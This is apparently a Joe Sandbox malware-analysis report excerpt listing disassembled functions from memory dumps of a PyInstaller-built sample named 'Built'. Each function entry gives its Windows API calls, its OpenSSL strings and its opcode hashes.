Associated: 00000005.00000002.2091238325.00007FFDF136A000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1390000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF13DE000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF13E4000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF13E6000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1402000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF140F000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2092865869.00007FFDF1413000.00000080.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2092944994.00007FFDF1414000.00000004.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdf10c0000_Built.jbxd

Similarity

API ID:
String ID: ..\s\crypto\async\async.c$T
API String ID: 0-2182492907
Opcode ID: 84e0df82d853d50b4fd7d046fc8fec4d13de8957f562a682e85f1a9d1bb3de25
Instruction ID: 45e3f8202411b6b70623e9062ca7a4586f97b9062f191e5a5a2c44eaa0cfe527
Opcode Fuzzy Hash: 84e0df82d853d50b4fd7d046fc8fec4d13de8957f562a682e85f1a9d1bb3de25
Instruction Fuzzy Hash: 03517C32B1964282EB20EB12D420DA977A9FF84B94F488435DA6D47BDDDF3DE509DB00

Function 00007FFDF1186D50 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 129networkCOMMON

Download Yara Rule

APIs

getnameinfo.WS2_32 ref: 00007FFDF1186DEB
htons.WS2_32 ref: 00007FFDF1186E5B

Strings

..\s\crypto\bio\b_addr.c, xrefs: 00007FFDF1186E04, 00007FFDF1186E86, 00007FFDF1186EA5, 00007FFDF1186ED5, 00007FFDF1186EF2, 00007FFDF1186F14
, xrefs: 00007FFDF1186DD1

Memory Dump Source

Source File: 00000005.00000002.2091238325.00007FFDF115D000.00000040.00000001.01000000.00000014.sdmp, Offset: 00007FFDF10C0000, based on PE: true

Associated: 00000005.00000002.2091206646.00007FFDF10C0000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF10C1000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF10CD000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1125000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1139000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1149000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF130C000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF130E000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1339000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF136A000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1390000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF13DE000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF13E4000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF13E6000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1402000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF140F000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2092865869.00007FFDF1413000.00000080.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2092944994.00007FFDF1414000.00000004.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdf10c0000_Built.jbxd

Similarity

API ID: getnameinfohtons
String ID: $..\s\crypto\bio\b_addr.c
API String ID: 1503050688-1606403076
Opcode ID: b69e7613c5b0375f733938ffa7987aef18c604bb2f14d9f82ce55754868d6c3f
Instruction ID: 6bafec0d53c0362c1d3595a048d8b356c4c4a5fd95c9e867dd1ac116cb273fc5
Opcode Fuzzy Hash: b69e7613c5b0375f733938ffa7987aef18c604bb2f14d9f82ce55754868d6c3f
Instruction Fuzzy Hash: FF51B162F1865386FB209B11D470ABA73A8EB41748F44C135EAAD476DDEF3DE845CB00

Function 00007FFDF10C3841 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 82COMMON

Download Yara Rule

Strings

..\s\crypto\bio\b_sock.c, xrefs: 00007FFDF1189C1A, 00007FFDF1189C9D
J, xrefs: 00007FFDF1189C95
host=, xrefs: 00007FFDF1189D0E

Memory Dump Source

Source File: 00000005.00000002.2091238325.00007FFDF10C1000.00000040.00000001.01000000.00000014.sdmp, Offset: 00007FFDF10C0000, based on PE: true

Associated: 00000005.00000002.2091206646.00007FFDF10C0000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF10CD000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1125000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1139000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1149000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF115D000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF130C000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF130E000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1339000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF136A000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1390000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF13DE000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF13E4000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF13E6000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1402000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF140F000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2092865869.00007FFDF1413000.00000080.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2092944994.00007FFDF1414000.00000004.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdf10c0000_Built.jbxd

Similarity

API ID:
String ID: ..\s\crypto\bio\b_sock.c$J$host=
API String ID: 0-1729655730
Opcode ID: 31c7aae0c6204fcaae541c015ea13e20bcfa82d779c5bb0f8b846d03ff15bf19
Instruction ID: b35d75761ff05747ab1e79697511e621a8e8f1dbd3d1af461e87b6f0afd4ea37
Opcode Fuzzy Hash: 31c7aae0c6204fcaae541c015ea13e20bcfa82d779c5bb0f8b846d03ff15bf19
Instruction Fuzzy Hash: 6E318E36B0858282EB10DB55F4619AEA364FB85794F444135EBAC47BDEDF3DD5408F00

Function 00007FF626647E10 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 81COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(00000000,?,00007FF62664352C,?,00000000,00007FF626643F23), ref: 00007FF626647F22

Strings

%.*s, xrefs: 00007FF626647EDB
%s%c, xrefs: 00007FF626647E94
\, xrefs: 00007FF626647E87

Memory Dump Source

Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd

Similarity

API ID: CreateDirectory
String ID: %.*s$%s%c$\
API String ID: 4241100979-1685191245
Opcode ID: 517c45005fecb665460f06d6deeb7a52b86fc8f3bacaeb8cdec2a0b3fdaf0698
Instruction ID: 540cced50a328dd1f20bb940f2d3fe54eabee7226bfb0d1752e4e80dd14acea4
Opcode Fuzzy Hash: 517c45005fecb665460f06d6deeb7a52b86fc8f3bacaeb8cdec2a0b3fdaf0698
Instruction Fuzzy Hash: 0E31D421719AC245EE718B21EC603EA6364FF94BE4F040231EA6D87BC9DF6DD6059F02

Function 00007FF626642810 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 65windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32 ref: 00007FF6266428EA

Strings

[PYI-%d:%ls] , xrefs: 00007FF626642868
Error, xrefs: 00007FF6266428DD
ERROR, xrefs: 00007FF62664286F

Memory Dump Source

Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd

Similarity

API ID: Message
String ID: ERROR$Error$[PYI-%d:%ls]
API String ID: 2030045667-255084403
Opcode ID: d0f77ace03032ad826a8cfca47aff52564341a40e7b1b64160a5aa56c6ce0663
Instruction ID: bdd7f91bfeed5a8977b4cfee13161e5ebdae5eaf08ae7c9fc98273865e83f8d3
Opcode Fuzzy Hash: d0f77ace03032ad826a8cfca47aff52564341a40e7b1b64160a5aa56c6ce0663
Instruction Fuzzy Hash: 1A21D372708B4292EB20DB14F8447EA7364FB88780F400132EA8D97756DF3DD259DB42

Function 00007FFDF10C1C76 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 57COMMON

Download Yara Rule

APIs

00007FFE1FFB5630.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDF127647A

Strings

DH PARAMETERS, xrefs: 00007FFDF127642B
..\s\crypto\pem\pem_pkey.c, xrefs: 00007FFDF12764A4, 00007FFDF12764C9, 00007FFDF12764E0
X9.42 DH PARAMETERS, xrefs: 00007FFDF1276469

Memory Dump Source

Source File: 00000005.00000002.2091238325.00007FFDF10C1000.00000040.00000001.01000000.00000014.sdmp, Offset: 00007FFDF10C0000, based on PE: true

Associated: 00000005.00000002.2091206646.00007FFDF10C0000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF10CD000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1125000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1139000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1149000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF115D000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF130C000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF130E000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1339000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF136A000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1390000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF13DE000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF13E4000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF13E6000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1402000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF140F000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2092865869.00007FFDF1413000.00000080.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2092944994.00007FFDF1414000.00000004.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdf10c0000_Built.jbxd

Similarity

API ID: 00007B5630
String ID: ..\s\crypto\pem\pem_pkey.c$DH PARAMETERS$X9.42 DH PARAMETERS
API String ID: 2248877218-3633731555
Opcode ID: 3ba81f49d5ceb9f4a6875a9e5438a20396f096326d0a69e27fc56574318964df
Instruction ID: 63c937320265c4fb2cb6959b281418910ebd7713f8549d46a6e6895c93ea6c47
Opcode Fuzzy Hash: 3ba81f49d5ceb9f4a6875a9e5438a20396f096326d0a69e27fc56574318964df
Instruction Fuzzy Hash: 1821A121B0CA8382EF20DB55F0209AAA3A9FB84794F404131EA9C47BDDEF7DE144DB00

Function 00007FFDF10C139D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38networkCOMMON

Download Yara Rule

APIs

socket.WS2_32 ref: 00007FFDF118AA50
WSAGetLastError.WS2_32 ref: 00007FFDF118AA5B

Strings

2, xrefs: 00007FFDF118AA85
..\s\crypto\bio\b_sock2.c, xrefs: 00007FFDF118AA71, 00007FFDF118AA8D

Memory Dump Source

Source File: 00000005.00000002.2091238325.00007FFDF10C1000.00000040.00000001.01000000.00000014.sdmp, Offset: 00007FFDF10C0000, based on PE: true

Associated: 00000005.00000002.2091206646.00007FFDF10C0000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF10CD000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1125000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1139000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1149000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF115D000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF130C000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF130E000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1339000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF136A000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1390000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF13DE000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF13E4000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF13E6000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1402000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF140F000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2092865869.00007FFDF1413000.00000080.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2092944994.00007FFDF1414000.00000004.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdf10c0000_Built.jbxd

Similarity

API ID: ErrorLastsocket
String ID: ..\s\crypto\bio\b_sock2.c$2
API String ID: 1120909799-2051290508
Opcode ID: 2ef5472a3713315c0ebdeb3789e1964bedc6f77517e54092a2e54a431cd722de
Instruction ID: 36e8ee6c24a503126ff06afdf51508586f0e0b8e01eb7c0f4b5f022ace0495e0
Opcode Fuzzy Hash: 2ef5472a3713315c0ebdeb3789e1964bedc6f77517e54092a2e54a431cd722de
Instruction Fuzzy Hash: 9201CC32F0859283E3109B25E4209ADB268FB81768F608235E67D83ADDCF3DE941CB40

Function 00007FF62665C610 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 00007FF62665C68F
WriteFile.KERNEL32 ref: 00007FF62665C957
WriteFile.KERNEL32 ref: 00007FF62665C99D
GetLastError.KERNEL32 ref: 00007FF62665CA53

Memory Dump Source

Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: 1ea6e931977968e7606fd026366deb17473f9f47aeaf25dd19fcfb7bb3399e1d
Instruction ID: 77261c2cbaf06afefafb77863e4951acd1de37324186b6549721a396861f4a6c
Opcode Fuzzy Hash: 1ea6e931977968e7606fd026366deb17473f9f47aeaf25dd19fcfb7bb3399e1d
Instruction Fuzzy Hash: ECD12772B18A81CAEF10CF65D8401AC3B72FB45798F048239DE5D97B8ADE39D016DB42

Function 00007FF62665CFD0 Relevance: 6.2, APIs: 4, Instructions: 218COMMON

Download Yara Rule

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF62665CFBB), ref: 00007FF62665D0EC
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF62665CFBB), ref: 00007FF62665D177

Memory Dump Source

Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd

Similarity

API ID: ConsoleErrorLastMode
String ID:
API String ID: 953036326-0
Opcode ID: 6e58aef6e17acf8d0a0aea0d946e1cce7a25eacb923cf4c64ad3114965f560b8
Instruction ID: c47d77fa4b4835e9aa27897f6ed74f9962e318b048ebcc3636f6b5a1fb7d199d
Opcode Fuzzy Hash: 6e58aef6e17acf8d0a0aea0d946e1cce7a25eacb923cf4c64ad3114965f560b8
Instruction Fuzzy Hash: 6191E832F1865295FF609F659C4127D2BA0BB40B88F144139DE0E976D6CE3ED482EB07

Function 00007FFDF10C2DEC Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 173COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FFDF122A380

Strings

unknown, xrefs: 00007FFDF122A3B3, 00007FFDF122A47A
Operation not permitted, xrefs: 00007FFDF122A374

Memory Dump Source

Source File: 00000005.00000002.2091238325.00007FFDF10C1000.00000040.00000001.01000000.00000014.sdmp, Offset: 00007FFDF10C0000, based on PE: true

Associated: 00000005.00000002.2091206646.00007FFDF10C0000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF10CD000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1125000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1139000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1149000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF115D000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF130C000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF130E000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1339000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF136A000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1390000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF13DE000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF13E4000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF13E6000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1402000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF140F000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2092865869.00007FFDF1413000.00000080.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2092944994.00007FFDF1414000.00000004.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdf10c0000_Built.jbxd

Similarity

API ID: ErrorLast
String ID: Operation not permitted$unknown
API String ID: 1452528299-31098287
Opcode ID: 98fd99213be571fb8821e332285a7a3172dfad59924788fedf6360fac81b26b1
Instruction ID: 5916565582c9c4e3957436b2b11c1e5c5527d721a9f63cc47c6f73ca335a79d5
Opcode Fuzzy Hash: 98fd99213be571fb8821e332285a7a3172dfad59924788fedf6360fac81b26b1
Instruction Fuzzy Hash: D0816B21B0869286FB50AB51E875BBD23A8FB84784F840035DD6E87ADDCF3DE459D700

Function 00007FF62665F9FC Relevance: 6.2, APIs: 4, Instructions: 162COMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF62665FAEC
_get_daylight.LIBCMT ref: 00007FF62665FAFD
_get_daylight.LIBCMT ref: 00007FF62665FB0E
_isindst.LIBCMT ref: 00007FF62665FBD9

Memory Dump Source

Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd

Similarity

API ID: _get_daylight$_isindst
String ID:
API String ID: 4170891091-0
Opcode ID: 4d98307b2f9efdc6516e3695475c092fba069f5f92b05f4e8f1f7e1348ba3a44
Instruction ID: 614e647a57ed7aa687d5cf7d64855e2decccac492ccd7bb54dd9c1051a4f11c6
Opcode Fuzzy Hash: 4d98307b2f9efdc6516e3695475c092fba069f5f92b05f4e8f1f7e1348ba3a44
Instruction Fuzzy Hash: 8A51E472F082128AEF24DF249D566BC27A5FB50358F500135DE1ED2AE6DF3AA4019F03

Function 00007FF6266557EC Relevance: 6.1, APIs: 4, Instructions: 119pipeCOMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 00007FF62665581F
GetFileInformationByHandle.KERNEL32 ref: 00007FF626655881
GetLastError.KERNEL32 ref: 00007FF626655912
PeekNamedPipe.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF626655724), ref: 00007FF62665595E

Memory Dump Source

Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd

Similarity

API ID: File$ErrorHandleInformationLastNamedPeekPipeType
String ID:
API String ID: 2780335769-0
Opcode ID: 9a0c598da5bacb08a65281ee6853743b6bc645484a6b27ddd69bc7d98502ecbe
Instruction ID: ac2fc6da97adcbe52dcd2b1ec6b1ed622f2d1fdc720641d3268b5036b9825285
Opcode Fuzzy Hash: 9a0c598da5bacb08a65281ee6853743b6bc645484a6b27ddd69bc7d98502ecbe
Instruction Fuzzy Hash: 6451BC62E186828AFF10DFB1D8553BD23A1BB48B58F144435DE0D9B68ADF3DD450AB43

Function 00007FF6266420C0 Relevance: 6.1, APIs: 4, Instructions: 52COMMON

Download Yara Rule

APIs

EndDialog.USER32 ref: 00007FF6266420F4
SetWindowLongPtrW.USER32 ref: 00007FF626642116
GetWindowLongPtrW.USER32 ref: 00007FF626642140
InvalidateRect.USER32 ref: 00007FF626642160

Memory Dump Source

Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd

Similarity

API ID: LongWindow$DialogInvalidateRect
String ID:
API String ID: 1956198572-0
Opcode ID: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
Instruction ID: d86fb4ccf68ccb054c457f0c74111a0236675593fdd9ef4bc345d6e5123cef19
Opcode Fuzzy Hash: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
Instruction Fuzzy Hash: 8911E921A0C14382FE64876AFD9427A5296FB84780F544030DB4987B8DCDAFD491AB03

Function 00007FF62664D080 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF62664D0AC
GetCurrentThreadId.KERNEL32 ref: 00007FF62664D0BA
GetCurrentProcessId.KERNEL32 ref: 00007FF62664D0C6
QueryPerformanceCounter.KERNEL32 ref: 00007FF62664D0D6

Memory Dump Source

Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

